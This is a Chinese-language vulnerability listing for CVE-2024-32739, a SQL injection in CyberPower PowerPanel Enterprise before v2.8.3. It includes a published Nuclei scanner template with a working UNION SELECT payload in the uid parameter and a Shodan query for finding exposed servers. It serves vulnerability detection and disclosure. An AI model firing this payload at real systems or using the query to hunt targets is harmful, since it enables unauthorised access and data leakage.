CVE-2024-32739: CyberPower < v2.8.3 - SQL Injection

日期: 2025-08-01 | 影响软件: CyberPower | POC: 已公开

漏洞描述

A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.

PoC代码[已公开]

id: CVE-2024-32739

info:
  name: CyberPower < v2.8.3 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
  impact: |
    An unauthenticated remote attacker can leak sensitive information via the "query_ptask_verbose" function within MCUDBHelper.
  reference:
    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
    - https://www.tenable.com/security/research/tra-2024-14
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-32739
    epss-score: 0.61869
    epss-percentile: 0.98246
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"<title>PDNU</title>"
  tags: cve,cve2024,cyberpower,sqli,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ':"finished"'
          - '"results":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '"code":"([0-9.]+)"'
# digest: 490a00463044022055f742b0c21b5979a9a821e03dbc64e3a9213591bbc086d0576440fe791e303e0220502d4c47f9cedf3907dd3bed1b358d02a2f2772949dda172c036662668ec748c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐